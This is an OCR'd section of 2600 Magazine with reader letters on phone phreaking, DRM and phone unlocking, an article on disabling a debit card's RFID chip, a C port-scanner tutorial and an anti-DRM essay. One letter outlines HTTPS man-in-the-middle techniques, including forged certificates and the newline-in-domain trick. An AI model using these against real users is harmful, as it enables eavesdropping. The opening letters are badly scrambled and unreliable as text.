voice. Lines were numbered 111 through 899. not all. Hexagon Sun Dear 2600: W h i l e reading the November/December issue of the Mensa Bulletin I came across an article describing an incident in the author's teenage years that I thought might be interesting to your phone phreak type readers.) has always been sublevel.. film. This ( was an all-relay (no steppers. where did you find him?" She smiled that sardonic grin of hers and replied.) I "So how long have you known him?" I asked. In a few short years." I'm enjoying your magazine as I always have (though I've missed a lot of issues). "I just met him tonight for the j first time. Fred and Tanya would both hang up and Fred would call Tanya for a one-on-one phone conversation. et al." We welcome other • such stories or memories from the past.' activated just by speaking the name or number of the called party. not underground. (The author and two girl friends were on a blind date with three young men. My writing became sloppy and my programs weren't writing themselves out of where I sent them.information and learning how to breach systems of any kind (hacking) that are "not used for illegal activity" should be embraced by more people for the sake of understanding our world and lives. However. sometimes more than 100 young pups trying to get a beep in. Ten kids. and it was busy. "Tanya-beep-my-beepnumber-beep-is-beep-eight-beep-six-beep-fivebeep. as I speak to and meet people in the younger generation. Green was the ringing code to be sent on line number 311. while your discovery is certainly an interesting one and would probably give the authorities something new to panic over. tion of tomcats in an aviary. some .. It is possible. crossbars. We found an explanation of this from a 1963 edition • of Time Magazine: "It works because.. 50 kids. Those Beep Lines were always busy. 1)The computer forensics people at the feds are either really good at pretending to be dumb or actually useless in setting out to do their job. on much of the nation's telephone equipment. I wish I could say more but can't right now. for instance. or panels) switching system by North Electric of Galion. you'd hear.e. I knew exactly what the Beep Line was. our C O was upgraded to rotary dialing and this permitted the mute and deaf to place calls. I also want to quickly mention two things. three digits for the line number." I nearly choked. To place a call. every call reaching a busy number is shunted away into a ganglion where the busy signal is produced. Thank you for reading. So.

what the ways around it are. Some of the expansions to 1 + and 0+ include: 11 equal to the "*" on a touch tone keypad." then you get a fast busy signal. it goes directly to the fast busy. will it allow the signal to stop their machine also? Thanks for any assistance which you might be able to give. we're better off asking if any of our other readers have any experience with this issue and. will the signal that is stopping the D V D player be recognized by the VCR. MAin 0-2368. Spring 2010 whole lot more interesting. We'll ask around. Grumble It's really amazing to hear such tales of the old days when phones were truly magical. A large American telephony company (think Death Star logo) began promoting a uniform numbering system to permit national and eventual worldwide direct distance dialing of all calls. a message comes up that says it's source-protected and stops my taping.at least back in those days when your readers were writing in about analog cell phones. The Digital Millennium Copyright Act makes this sort of control legal and new technologies like digital television and DVDs make it possible. What I'm hoping for now is for someone to reveal how to hack this phone as it seems to think I want to connect through that T-Mobile network (so they can bill me obviously). Anyways. A "0" first plus ten digits triggered operator handling. You can be assured of finding the answers in these pages. Emma smoking up a storm while on the phone. That said. Encore. All I can find on the Internet is a method of inserting a SIM card from someone who actually got sucked into signing up on their "network. After dialing the fourth digit. You may soon see even non-premium programs "protected" against recording onto DVRs or DVD recorders. With my D V D recorder I am able to record all the lower channels with no problems. if you pick up the receiver. We appreciate your sharing all of this.wtng. try www. It's typical corporate bullshit. Dear 2600: I am shocked to see the cover of 26:3. if so. For fun. A "1" first plus ten digits would alert the C O that you were placing a non-local call. etc. My number was 36262. Not with her but the lack of protests by those who seem to know what's best for the rest of us. Users would dial seven digits for local. Is it just a coincidence or is it part of the master plan that "1" is also the country code for North America? Most countries use "0+" or "01+" when placing a non-local call. it will allow you to press up to nine digits before it goes to fast busy. For country codes. This usually happens within one to two minutes of starting to tape and the process is then stopped. eleven digits for North America and 12+ for the world.com/ reports." If Android is truly open source. stealing a police car (while under arrest for a misdemeanor possession of marijuana). 1 Dear 2600: Recently I had Verizon install their FIOS service to my house. I want to phreak this phone! Please help. I have discovered that after shutoff time. we're not familiar with what exactly is happening here and it's possible that this particular instance is a configuration issue rather than an attempt at control on Verizon's part. 011 for an international call direct. 547-382. 00 for your long distance company's operator. when I try to record the higher premium channels ( H B O . then there must be a better way? Help! Leonardo You will still need to unlock the phone as TMobile has chosen to lock the CI despite the software itself being open source. No more of 36262. Complete numbering plans are at www. finally. North American cell systems use ten digits for all "local" calls. Dear 2600: I am only a novice phreaker currently incarcerated in Texas for escape from the county jail. considering it is an older technology? If I buy a D V D recorder from Verizon. and misappropriating the funds of another county jail bank account. It is provided by Embarq Payphone Systems Inc. and if you hit any button before the message finishes. we found a website at www. Dialing the fifth digit would send the correct ring for the called party. This is exactly the kind of thing we foretold during our trial back in 2000. it will say "no calls allowed at this time. I've gotten with the times and got my hands on a C I phone.). etc. Okay. you were connected to a line. W h e n touch dialing. But your story is probably a Name Deleted Page 43 ^ . For unlocking. Help Needed Is there a way around this wonderful practice of Verizon? If I use my VCR.nanpa. NY Now we see the pitfalls of certain technologies that are forced upon us.with a rotary dial). But if you hit **. you could dial four semi-random digits and wait for someone to pick up on the line. Bob Newburgh.html. What I am writing about is the phone system they provide us.com that will supply you with an unlock code for $25. Enough about me. I've been reading 2600 for a long time . a "tt" meant end of dialing (or send). As Verizon will likely have changed their name again three more times before they get around to wiring us for FIOS. which is nice to browse the Internet with at the local coffee shop. 01+ for an international call with operator assistance.info/ wtng-cod.unlock-tmobilegl. However.

you should be able to see what exactly is at the location in question. it gets the SSL certificate. In this setup. (My guess ^ Page 44 2600 Magazine ' .google. e. the first partition inside your extended partition on the hard drive. You can't (1) G R U B is open source. m = (m & ~x) « 1. So let's say you're running a "PortaNet" and are the man-in-the-middle. Reprise Software Inc. Some other boot loaders are probably small enough to fit well inside the first 5120 bytes. In April 2008. and then starts an encrypted tunnel for all the traffic to go through. For years. luckily..google. Inserting a dummy string at the few actually checked bytes and/or keeping the linker from using the block (address range 0x1400 to 0x15FF) where the license manager wants its few bytes should be enough.. and this way you have a chance the chain boot loader stays preserved. it will rewrite the M B R anyway (sigh). there are at least three ways to solve the problem (not only "to fiddle around it"): (0) Use the Windows boot loader to start XP or Ubuntu. in case your instruction set lacks that particular capability. Today we have quite comfortable and pretty fancy multi-boot loaders and it becomes a problem. You can likewise subtract 1 from an integer through some simple 2s compliment manipulations. LILO or G R U B ) . by DieselDragon. Matt Christiano and several of his team left Macrovision in 2006 and founded a new company. you presented a nice story of "real-life debugging" and development of a functioning workaround in your article." (26:4) from dolst re " O n e final amusing tidbit:" Originally FLEXIm was architected 1988 by Matt Christiano.google. could compile a G R U B version that "leaves out" the H D D sector which is (ab)used by the license managing software. Hope that helps someone. thanks for your great work! Hope to see your tees and polo shirts one day over here in Germany..a part of your company relying on deep technical information from someone competing with the D R M part of the same company is not a good situation. So when their browser goes to https:// mail. is they store a copy of the DiskID there. Their browser has a list of certificate authorities (or CAs.com. but some parts of it were a bit wrong. that you can man-in-the-middle people who are using HTTPS websites and eavesdrop on what they're doing. the Windows loader is tricked into chain-loading another boot loader (e. while(m) { x A = m. basically. One of the victims tries to go to https://mail. and the official SSL certificate for mail. convention was that the first cylinder of a hard drive only hosted the M B R and nothing else. This is likely why someone had the "bright idea" in the past to store a copy of the serial number on it. then it will display a giant scary security warning telling you that someone might be trying to eavesdrop on you and that you should probably not go to this site unless you really know what you're doing. Advantage: If you ever change/update/repair your Windows XP. you cannot eavesdrop on it. He says.g.More Dear 2600: I came up with the following C routine to add 1 to an integer.) If you compile G R U B and set the linker to generate a map file. verifies that it was signed by one of the CAs in its list. Looking forward to reading about which way you chose for the "real fix" in a future 2600 issue. The official reason for this was that Microsoft entered the D R M market and Macrovision wanted to avoid a conflict of interest . dolst (or someone else skilled with time on their hands). Dolst. G R U B can reside almost everywhere. If the SSL certificate isn't signed by a CA though. 2600 team. } Brian Dear 2600: Some additions/corrections to "Hey Adobe!. GLOBEtrotter Software merged with Macrovision in 2000. Macrovision spun off their InstallShield and License Management software business into a new company called Acresso. Regarding the G R U B boot loader code being overwritten by FlexNET license manager. (2) Use another (smaller than G R U B ) boot loader (like LILO) to boot G R U B from. if someone is using SSL (and HTTPS is just SSL wrapped around HTTP). I think it might have some hack value: Info int inc(int x) { int m = 1.com. Acresso changed its name to Flexera in October 2009.com. who in 2003 rebranded the software as FlexNET.google.com was signed by one of those CAs. if you "change (if necessary) and pass on any security certificates or other authentication tokens that the victim's browser would normally use to check that the connection is indeed 'secure'. Dear 2600: I enjoyed the article in 26:4 called L33ching the L33cher. Node42 One way to definitely see them over there fairly quickly is to buy them off of our website and start wearing them or handing them out to the locals. so you. the companies that sign SSL certificates to verify that they're valid)." But really. } return x. as follows: } int dec(int x){ return inc(~inc(inc(~x))) .. Lets say you're MitMing a victim who is going to https://mail.g.

thanks for putting it out there! Kyle lust for the record. There are several violations of the media review regulations in their denial and I will ultimately be successful. 2009 I received a notice in facility mail that an issue of 2600 (25:4) arrived for me. 2) hack into the victim's computer beforehand and add yourself to their list of CAs in their browser. it's not really true. why would it be taught?" This was and is frustrating. when you MitM the victim and they try to go to https://mail. It's still a good idea to tunnel all your traffic through SSH anyway though. So I cannot comment on any of the actual content. Then. then you can seamlessly eavesdrop on them. "If the only use for higher math was to teach it. And finally.com\n. but then a giant security warning will appear in their browser (not very discreet). 24. In short. Some may be surprised about this fact. which was a blast . Looking over the issue in question. in their infinite curiosity. if I ever meet up with "hostileapostle. it didn't explain in any way how to do it yourself. profusely thank em. (Not that I can avoid a "freetrial" billing scam. But I never knew about Luhn checks. The third one gets really interesting. you can send them the fake one that's been signed by a real CA. which probably won't happen. since I am presuming that the pages listed contain nothing of the sort. and pay a CA to sign an SSL certificate for that. Much like their attempt to treat source code excerpts as a secret communication channel.com as just mail. a few of them seem almost thankful that I have taken the time to tell them this.google. and had some links to resources where you could learn more.com. mOrebel Dear 2600: I have to respond about the "Free Trials" article (26:3) that lacked a system to circumvent the CVV number. So the only thing you can do if you want to eavesdrop on that traffic is to generate your own SSL certificate for mail. For reference.google. 32." Of course. The value to me as a reader is that now I have something to tell people why I am getting a math degree. that I want to do research in number theory. after I share this with them. I ask them a question. the reasons they are giving to deny access to this issue are that pages 6. I actually have something concrete to share with people when they ask the tired question: "So what.google. Dear 2600: O n March 10. thanks to that article. This article gave me something to tell people about that they can actually see. or 3) exploit some vulnerability in how the browser deals with SSL certificates.google. Name Deleted You would think that we had devoted an entire issue to breaking out of prison based on their assessment.2600." I thought you would find this information interesting. errr. rather than sending them a random SSL certificate that you just generated. as opposed to cryptology or research into the nature of prime numbers . you should be quite safe. the New York State Department of Correctional Services denied this issue of 2600."Smart Regression.com. it looks as if they randomly chose page numbers to categorize as "unacceptable." I am going to shake their hand. I am sure this latest suppression is nothing more than a lack of understanding." What an article! I brought it up in sociology. Great mag . once again consid- ering that I am from a generation where people have been surrounded by technology since infancy . assume that I am going to merely become a teacher. com and issue it to the victim instead of the real one. corn's SSL certificate secret key.) I am a university student and people. Then I share with them some elementary number theory. you could buy an SSL certificate for the domain mail.^ Spring 2010 decrypt that traffic unless you have mail. The ways to get around that giant security warning are: 1) pay a CA to sign your certificate for mail. Thank you very much for sending me a copy of your excellent publication. to avoid session sidejacking and whatnot. 26.com. I then ask them if they have any "cents off" coupons or credit/debit cards on them. However. Diesel Dragon warns users not to do anything private or important (like online banking) on public wifi because people can just MitM your SSL connections. I think it would be great if there were a follow-up article that lists all the tools (for each applicable operating system) you would use to recreate some of these attacks. 8. and no one has that except Google (I hope). showed some examples. Suddenly it's as if I have led them into some undiscovered territory. while the article had lots of good information in it. Well.that is until I read page 4 in 26:4 .some red faces that day.com. there is much hand shaking and beer buying at our HOPE conferences which is where many of our readers and writers co-mingle.which is something that I am only starting to learn about on a long journey that I have only just begun. 50. and 56 are unacceptable because "articles describe procedures on breaching security/safety of correctional facilities. I heard about how some browsers would stop reading the domain name in an SSL certificate once it hit a newline character.com\n2600. After that article and one on faking coupons. but I look forward to defeating their attempt at suppression. 13. our telling you this has probably earned this page the same label. \n. and buy em a beer or coffee. and you have the latest version of your web browser. At the end of the article. • Page 45 • . If you're using a service that locks you into SSL the entire time (like PayPal. most banks. and even now mail. So if you own the domain name 2600. 49. 33. and if they have a vulnerable browser that reads mail.google.google.com). are you going to be a teacher or something?" I tell em no. Then.google.google.com.

Then. I could do this . The teacher had some little plastic magnetic strips for storage. w h i c h w a s small. but there was a lock on the rotary phone dial that the teacher w o u l d unlock and dial the connection number on. Heavenly. a w e got a pen plotter that you could control with down. he laughed and just told me not to do it again because he had to justify the very high charges to the upper ups. move to (x. again. and the idea of connecting any time was to much to resist. But alas. the calculator. From then on out. W e went to the lab w h e n the teacher w a s in a math class and the lock was in place. make a line. but here is the story from 1972 of my first hacking experience. found the The Best Of 2600. Pretty consistent with when he was in a math class. move to (x. reverse polish notation calculator. All the classes w e r e 45 minutes long and during computer class.y). W o w . D o o m and gloom time. O n e day. H e must have checked the phone bill for the times the connection was being used without him in the room. After about a week of me alone and with my hacker friend. I could do that. put the phone back. the door to the computer room was locked and. Since the teacher had more than one math class. and had to buy it. which was anyone. As part of the math department. M y teacher was a hacker and hacked me back. maybe 10 students at the most. M y now ex-friend wasn't too happy about it either. It was thick and filled with interesting anecdotes through and through. I wish I could have contributed to it. M y favorite subject was math. W e had at it until just before the math class ended. when in walked the teacher. M y friend picked up the receiver and. The door to the computer lab wasn't locked. There was only one teletype and modem connection. In no time. without unlocking the dial (we all knew the number because w e watched it being dialed many times). and I did. I was happily typing away at my usual 'everyone is gone' time. to say the least. I thought I was going to get kicked out of computer class as punishment. I thought. like it was Christmas. a particularly bright student/geek/ hacker asked me if I wanted to help him work on a private program w h e n the teacher wasn't there. pen programmable for computer labs. and it broke my heart to think about it. flack The language was basic but it was all as high tech as you could get. the teacher got a bill that was $750 over what he expected. I went to school at C u n n High in Palo Alto. never to be needed again. pen up. took that paper readout from the teletype. I think my teacher must have had some and liked it enough to get us an 'upgrade. The other side connected and started the modem phase. make a drawing. O n e day.est by fobg I went to the book store to look in the computer section for anything interesting. thinking he must have a key to the dial lock and permission from the teacher. It w a s a fairly n e w school. and left. H e demanded to know how I was able to dial without unlocking the dial. they could only be used lines. and my friend had overlapping classes. H e made it clear that it cost $50 per hour for the time on the Stanford PDP-11. W o w . etc. and some were preprogrammed and some were blank for money and. Quite the contrary. caught and not punished. they had a computer class using a teletype and a 300 baud modem with an account at Stanford University. I jumped at the chance. Connect the robot in 1972. with a college campus layout. I'm now a hacker with just me at the keyboard. w e w o u l d head to the computer room and get some hands on time writing programs.y). H e was 2600 Magazine ^ . so w e w o u l d all collaborate on one program and take turns typing it in. no one would find out I was working alone. I loved programming. through the window. I was caught. the pens cost the students to store programs on so w e didn't Vi • Page 46 • particularly proud of one preprogrammed card have to retype a program in each time. you could see the dial lock was missing. I sang like a bird and ratted on my friend as well. this is great. so w e should get as much typing in as possible each day. for 32nnnnn. w e w e r e connected.' I to do my programmable and available at all hours to Soon after that. he began dialing the number by pressing the hook button in rapid succession with a slightly longer pause between each number. b y myself. as always. H P donated an H P 9100A friends at Stanford and H P that heard the story w a s soon programming the 9100A began reading every math book in the lab and math homework. Hey. Being just a scared kid caught red handed. all geeks. Like "click click click pause click click pause.

I was in the lab by myself 'playing' on free time. point per side. D o good to others and others will do good to you. Four sides: because now he could use it to show students I went from a sure flunk out to a sure A because of hacking. Ten sides: decagon. I went to a local convenience store that s7a11 remain anonymous. like a circle. She informed me that all Citizen's debit cards would be replaced within the next few months. D o so at your o w n risk. and in walked the teacher. J e k y l l and Mr. every time I check the rack. and some of it is useful. I think they got a message somehow that 2600 is a good thing because it makes them more money than Harper's Bazaar. there are 10 to 15 copies of 2600 and you couldn't fit a bigger mag over them or it w o u l d topple over and hit the floor. As I handed over my Big Grab of Doritos and 20 oz. I guess the dates aren't really all that important. Two weeks later. shapes. N o w I go in and. 30 sided. I heard The Problem 2010- -Page 47^ . pen down. and asked about the new debit cards." I spoke with the teller. M y teacher was impressed that a circle was just a polygon made with one square. and probably 5 0 % of the other rags in the rack. 11001001 to buy formula for little 11001010. the more it looked draw just about anything. pie by connecting them He wanted together. all because I can " d o the math.. I realized that I had just given all of my cash to Mrs. program. By the way. H e could make circles. etc. I paid my house off early to save the interest and I don't gamble and hope for a change of luck. V Spring A few days later. make polygons. Next thing the computer. W a s it Christmas again? me several plotter pens (for my personal use). There is always something beyond them. "The N e w Citizen's Bank Debit Card with PayPass!" . Diet Coke (the greatest lunch on the face of the Earth). I swore under my breath as I moved my debit card toward the reader. There is no intent to defame or libel Citizen's Bank.. write labeling As I got better at programming. All the events portrayed within are entirely factual in nature. Never needed bailout money to pay off my mortgage. PayPass by 11001001 Forgive me for not including dates. just an intent to provide information. that 100 sided. this sat dormant for a while after I took the photographs. I informed her that I was a little too familiar with R F I D (Radio Frequency IDentfication) technology to be comfortable The Introduction M y active debit card w o u l d expire soon. Three sides: triangle. they used to be there. H e gave copy of the letter printing program. M o v e to (x. which I did with almost all of my I knew. even if they were not set to expire (mine was). arcs. things. I promise.y). the plotter. "Coming Soon!" it read. about how they only had a few copies of 2600 and they were always behind a bigger magazine. "Ask for Details. anyway. The more sides. 20 sided.that wrote numbers and letters for a letter. Pen up. From the Author It was a random day I chose to go into the bank to deposit a check when I first saw the new sign. so I let him have a copy. move over (x). and.. "math is good". I've been writing programs ever since and have made a good career as a computer diagnostic engineer and staff programmer. M y lesson: dare to explore the boundaries." I saw math and said. my new PayPass equipped debit card arrived in the mail. pen up. and asked if there was an option to get a card without PayPass. Usual disclaimers apply: I do not condone nor endorse the actions that I took in this article. G o Red Sox! with it. She said no. You told it how many sides centered on the page. Names and pertinent numbers have been removed but. and using I wrote a program that would you wanted and a radius and it w o u l d draw it. and several blank storage cards. so I had no choice but to activate the new one. the book store w a s the same one I wrote about in a letter. a Dr..

Then I smacked myself on the forehead. but then decided that microwaving the debit card could only have two possible outcomes: O n e . Next. without my intending it to do so. and the screen on the reader displayed "Approved. I'd need to buy a new microwave. or "Approved. The clerk looked at me and commented. Still no S response from the reader. and it looked like I was successful! couldn't keep it from working. because I realized that if I w i p e d the card. First.. Then my debit card w o u l d just be a really convenient ice scraper for those cold N e w England mornings. The Test Part I ] j | "not growing up to turn out like his. I thought it over. "Please enter P I N or press cancel to process as Credit." Booyah! I entered my P I N and almost was oblong. I handed them over to the cashier. The chip! That was it! I decided that if I trying this at home? This is where that applies. and got my total. and told him I'd like to explore other options before completely destroying my method of rapidly heating a Tina's fifty-cent burrito. as Also Sprach Zarathustra played in my head. mulling over what to do about it. It took two noid. I think it is.a beep. I got home and stared at the stupid thing. I borrowed my father's single-hole The Plan with a Sharpie so that 1 knew where to do the punching." as she left the room. Then. it w o u l d work. lights. saw a light flash. waved the card over the reader." I took a deep breath and tried again." I think my ear-to-ear grin confused him as I said. Hulk Angry! I knew I somehow had to disable the R F I D chip in the card. " M a y b e it's broken. as the mark I'd made to cover the chip Page 48 2600 Magazine ' . I marked the front of the card I returned to the 7-11 and picked up some Doritos and a Diet Coke. and mumbled something about our son N o beep.. my trusty electromagnet. I thought of good ol' wipey. Then. Two. my wife called m e crazy and para- punch. I discussed my predicament with a programmer friend of mine.. That part I said at the beginning about not First.. I punched out the spot. Nothing. I'd just take it out." The clerk handed me my receipt and my lunch as I stood there looking dumbfounded." I ran the card d o w n through the skimmer. "Yep. jr Cit"'" The Discussion I sifted through what fell out. I'd also lose the stripe. The reader had just read my PayRass. Then. I thanked him for his advise. Golden. a glint of something caught my eye. H e informed me that he had heard that microwaving things w h i c h contain R F I D chips destroys said R F I D chips. Then. punches.

I like carrying around my little reminder of how I stuck it to "The M a n . "You'd better go try it. of course you have that option. . Indeed she was right back." she w a s actually very understanding. I went to the teller with my tail between my legs. you'd find that a 2. " Although it sure is a pain in the asterisk that I can never use an ATM. I didn't know. and she told me that she'd be right back. I parked the car out back and took the steps two-at-a-time. w e offer the new debit cards with or without PayPass. you're the first person I've ever heard of doing something like this. Although 1 never had prior to this occasion. and we'll go out for dinner.html Wikipedia: R F I D Technology Page http://en.. If you didn't request a card without PayPass. "I'll order you a new card without PayPass right now. A new screen now on the A T M : "This machine is closed for service.A." Okay. " W e l l . The stripe still worked. It should be noted at this point in time that the A T M at the full branch office I went to was not the branch mentioned at the outset of this tale. unconvinced.com/us/personal/ •en/aboutourcards/paypass/ •index. I inserted it into the machine and.citizensbank. " W h a t happened?" she presses on. "Card Read Error." 1 already did that. I still haven't activated it.") yet. it comes with it automatically." After completing the necessary paperwork to regain possession of my debit card.. Shoot. "B-b-but the t-t-t-teller at the [other] b-branch said that I d-d-d-didn't have a ch-choice.. I hit " C a n c e l " and the A T M returned to the home screen. The Aftermath • • • • Citizens Bank Site . Thank you for your cooperation.U.org/wiki/ The Further Reading • RFID The Next HOPE Preregistration now open at www. "I am Jim's deflated ego. Please Try Again.. the hole?" I tried to play dumb to no avail. the machine promptly spit it back out at me. I inserted my card. • c i t i zensbank. Too bad the A T M ate your card. The card opened the door without problem. The teller directed me to the branch manager." I concede.wikipedia." she replied. "The front A T M just ate my card. I handed over my license." " O h . "Insert Card to Begin. " she says with an amused grin.h t t p : / / w w w . " she said. now wearing a look of puzzlement on her face. I decide to c o m e clean." W a s it only bad timing on my part? I went to the A T M at the front of the bank.. N o w the kicker-"Why didn't you just ask for a card without PayPass?" I could tell my wife was unimpressed as she shook her head. "Does it work at the A T M ? " she inquired. Get forty dollars out." " O h . Wait. who asked me for an ID card. Please find an alternate. she said. huh?" I grinned sheepishly and prepared myself for the onslaught ("I told you so") I'd receive w h e n I got home." Off to the A T M .h t t p : / / w w w . •mastercard. 2010 Hotel Pennsylvania New York City.S.com/ Citizens Bank PayPass Site .kope. it was PayPass free. "You know.com/paypass Master card PayPass Site . Sure enough. "What." I said.3 tremor occurred precisely where and w h e n my jaw hit the floor.. For various security reasons. after all. " H o w long has your card been like this?" she inquired.net ^Spring 2010 Page 49 -J July 16-18. "I know a little bit too much about the technology to trust it quite The Test Part II I am quite convinced that if you brought up seismology records for the Greater Boston area. I'll try again. Same results. There was no reason for it not to. Then nothing happened." I hear in Edward Norton's voice in my head.h t t p : / / •www. M y new new debit card c a m e in the mail a few days later. "Since yesterday. I began to stutter. "Yeah.forgot my lunch on the counter as I left in a hurry to apprise my wife of the situation ("I told you so.

h> •include <unistd. There is only o n e routine in this tiny fellow. /* assign the address */ A n d finally. Socket programming comes from U N I X . Even though this program w i l l only check one port and host at a time. 1023). so good. s i n _ a d d r . N o libraries." W i t h this descriptor w e open a "network connection" to the address via the specified port. argv[2].h> •include <sys/types. so let's setup the program: int m a i n ( i n t argc. 1023). or perhaps many.h> • • • W e could go into what all those are for. but for some strange reason you a) do not have a port checker on the system and cannot get one but b) do have a C compiler available. Pre-requisites for a quick and dirty (and I do mean dirty) scanner are simple: standard libc or glibc access to a C compiler an ascii text editor For argument's sake (ha ha) w e will make the usage like so: program <port> <address> That's it. main. I will demonstrate a simple wrapper script that turns it into a full blown scanner.sin_port = htons(port).h> •include <netdb.sin_port » htons(port). /* translate int2port num */ ^ Page 50 2600 Magazine ' . s_addr = inet_addr (addr) . knowing how to do this could pay off in other areas such as if you wrote your o w n server and would like a cheap check or a pre-connect check.h> •include <sys/time. sizeof(address)).h> •include <stdio. you need to be able to check a single port. The inet_addr(addr) function converts the string to an internal address for the libraries to use: bzero((char *)&address. here is the next chunk of code: port = atoi(argv[1]). N o w w e clear out the network data structure.h> •include <fcntl. sizeof(address) ) . /* file d e s c r i p t o r for the network socket */ So far. addr = strncpy(addr. char **argv){ u_short port. The scenario usually plays out w h e n you're a regular user. /* u s e r specified p o r t n u m b e r */ char a d d r [ 1 0 2 3 ] . Using libc string utilities. w e set the port to connect to: address. Additionally.h> •include <string. argv[2]. w e convert the ASCII to a number: port = atoi(argv[1]) . The fix: write a single port single host port check program in C. no make. bzero((char *)saddress. /* a s s i g n t h e a d d r e s s */ address. s _ a d d r = i n e t _ a d d r ( a d d r ) . on a system without package management./* Writing a Small Port Checker in C in 40 Lines (or Less) */ by Pantos It happens. It is worth noting that w e need a file descriptor for the socket. /* t r a n s l a t e i n t 2 p o r t n u m */ Let's have a closer look. then set the the address to be checked. So easy to do. it isn't funny. they do the job. or do not have the needed libraries to compile a scanner. Suffice it to say. Let's knock out the header files first: •include <sys/socket. but w e won't. /* w i l l b e a c o p y of a d d r e s s e n t e r e d by u */ s t r u c t s o c k a d d r _ i n a d d r e s s .h> •include <arpa/inet.1 .h> •include <errno. /* init addr struct */ address. First the code. /* i n i t a d d r s t r u c t */ a d d r e s s . where "everything is a file. /* the libc n e t w o r k a d d r e s s data structure */ short int sock = . Next.h> •include <netinet/in. just those three very simple items.h> •include <stdlib. w e copy in the address specified to the addr character array: addr = strncpy(addr. sin_addr. N o w onto setting up the information.

"F* A k . If it works.3 22 is open on 192. argv[2])./myscan 22 192. $i++) ( system(". If no route.1. This program does have a few weaknesses I left out for brevity: • It uses the default network connect timeout. feel free to wrap it with any scripting language you like.. } N o w it is time to compile and use the program: cc source.168. if (errno == 113) fprintf(stderr. for ($i = 1. In the same directory. create a perl wrapper like this: #!/usr/bin/env perl $host=SARGV[0].1. • The socket descriptor is not checked. Procurve Switch Hacking <enter> <enter> Spring 2010- ./myscan $i $host"). All that is left is to close the socket and exit: close(sock). Enjoy. The next bit of code looks a little crazy. huh? N o w it is time to make the connection.3 Pretty sweet. O p e n the master socket locally 2. this program will do the job and can be run as a regular user. Small. $i <« 1024. one might want to pre-ping before using this program • There is no input validation whatsoever. For the time being. if(connect(sock.(struct sockaddr *)Saddress. I leave those up to the bored to look into.Pretty cool. port. eh? But what if w e wanted to scan many ports? Easy enough to do in perl. print the successful message. once one gets into the habit. sock = socket(AF_INET. but this is what w e are doing: 1. C programming and network programming are not voodoo. efficient programs are often very easy to write. 0). 3. but for a quick and dirty portchecker.sizeof(address)) = = 0) printf("%i is open on %s\n". and make for lots of hacking fun. then complain with vulgarity (it is just a rapid prototype after all)..168. SOCK_STREAM. ) Of course.c -o myscan . Try to connect to hostbyport.no route to host\n"). return 0.

Arguably. most buyers will still be locked into a specific platform. Most of the readers have solved the problems of battery power. Considering the entire point of D R M is to prevent unauthorized copying by locking an instance of the software to a specific device. Read books in 320x240 on your DS. I have a lot of books. You don't " o w n " the book. you could loan the entire device to a friend for a week.but I'll never give up the printed copies. Hardware lock-in. goes out of busi- 4. H o w much of your privacy you give up remains to be seen. In the past six months. No anonymity. a protected book from one vendor won't be portable to another platform unless they authorize the transfer. Each book is correlated with the exact readers allowed to access it. There may be even more privacy concerns. Even ordering online has more privacy than DRM-regulated e-books. and now. authenticate on your friend's). Sony. If a publisher doesn't want to let you loan a book. you can borrow that. A book may be "loaned" only with the permission of the publisher. No used book stores. but generally serves the same point . W h e r e are those annotations stored? Are they public? Oftentimes. I'd love to have my entire collection in digital form . Irex. however. The real problem is e-books shift the balance of power. Somewhere I've still got service manuals f o r V T 1 0 1 terminals. it w o u l d sell more devices: "Sure. M a n y e-book readers allow user annotations on books. but who says I didn't give it to someone else? N o such protection on e-books. Instead of treating books like physical objects. but you need a FooBook too. Does the license that you agreed to allow the company to share them with other users. Sure. and with an apartment full of an amazing quantity of crap already. Probably buried under the other stacks. I've still got most of the Inside Macintosh books. You say you love your device? You're not interested in being able to move to a different vendor and keep your books? W h a t happens w h e n a device supporting your current format of books isn't made anymore. you'd think lending w o u l d be easy to implement (connect device. 2. margin annotations are the most personal interactions someone has with a book. V •Page 52- W h i l e progress is finally being made towards c o m m o n formats with E P U B coming to the fore. Being fundamentally lazy." S o m e devices (such as the Nook) advertise that borrowing is possible. plus. mine them for advertisements. W h a t are you giving up switching to books as software. however. no recouping some of your money when you no longer need a reference book. deauthenticate on your device. It can only be loaned to a person once. and put the savings into Lasik. The problem isn't the technology (for the most part) anymore. but I'm pretty sure I never had to agree to a 30 page E U L A before being allowed to check out at the bookstore. as flimsy as it may be. and you're not permitted to resell it. Ask anyone w h o ever got suckered into helping me move. The D R M system can't have it be any other way. Thanks to D R M . From 20 years ago. and it can only be loaned for a specific period of time.turning the book from a physical object into rented data. In Rascal. viewing angle. Acer. or appropriate them for whatever other uses? 3.by Dragorn W h y I Like Print (or "E-books C a n G o to H e l l " ) I'm a big fan of books. they're treated like licensed software. The E U L A may vary from vendor to vendor. Nintendo. but you can't loan your digital copy. This means no cheap college texts. and resolution by this point. For System 6. 2600 Magazine ^ . Apple. o w n i n g a copy of a book has never truly meant that you " o w n e d " that book. too bad. w h i c h many (if not most) do? significant limitations. assuming your books use D R M lockdown. every vendor seems to be trying to roll out an e-book reader that will save us from stacks of mouldering pulp A m a z o n (of course). Samsung. A book order can be correlated to my account. no book co-ops. Nook. and no getting rid of books you'll never read again. which are correlated with the accounts used to purchase it. there are 1. Apple. Loaning books to your friends. I can still walk into a bookstore and buy a book in cash with no record of the transaction (other than the assumed security footage).

O n e of the many values of printed media is the ability to archive it. A n d hope that you have friends with strong backs. magazine. leaving any annotations you make trapped on the original hardware. Using public. leaving users with no option but to repurchase their content. 6. But then again. and other meta-content may not be so simple. for example. but what if the new version is actually censored to avoid offending the company owners' sensibilities? Walmart. This is all more than just crankiness about having to buy all my books again. It's unlikely that the complaints of a minority w i l l change how electronic content is licensed. More insidiously. you risk no longer having access to the content you bought w h e n you want it. The book I have on my shelf isn't going to change itself unless I go and buy a new edition. non re-sellable electronic content fundamentally changes how w e interact with them and what is available to us in the future. The extremely well popularized incident where Amazon remotely deleted content from readers should have been enough to drive this home. go for DRM-free and open standards. Still have a working V H S player? 5. and some can't. it's convenient. is known for selling radio-edit music. There haven't been a lot of changes in the format of printed media.2600. M a y b e it's not such a big deal if your generic fiction book changes over time. So keep buying tree pulp. licensed. It's not like a book you bought is going to become unreadable five or ten years later. Format decay means your collection will be left behind. M o v i n g bookmarks. have been shut down. or decommissions the authentication methods needed? If you think it won't happen.ness. but it's entirely possible to have a new version pushed to your device automatically. margin notes. and if you must buy electronic. look at the history of D R M on other platforms: D R M systems from the biggest players in the field. some of the most treasured books are first editions or editions with specific errors. unchanged. but apparently it wasn't. 2 6 0 0 P O I O 5 W R T S f Get yours by visiting the 2600 •Spring 2010- online store at Page 53 ^ http://store. and removing adult content from recently acquired Vudu. there is no reason a vendor w 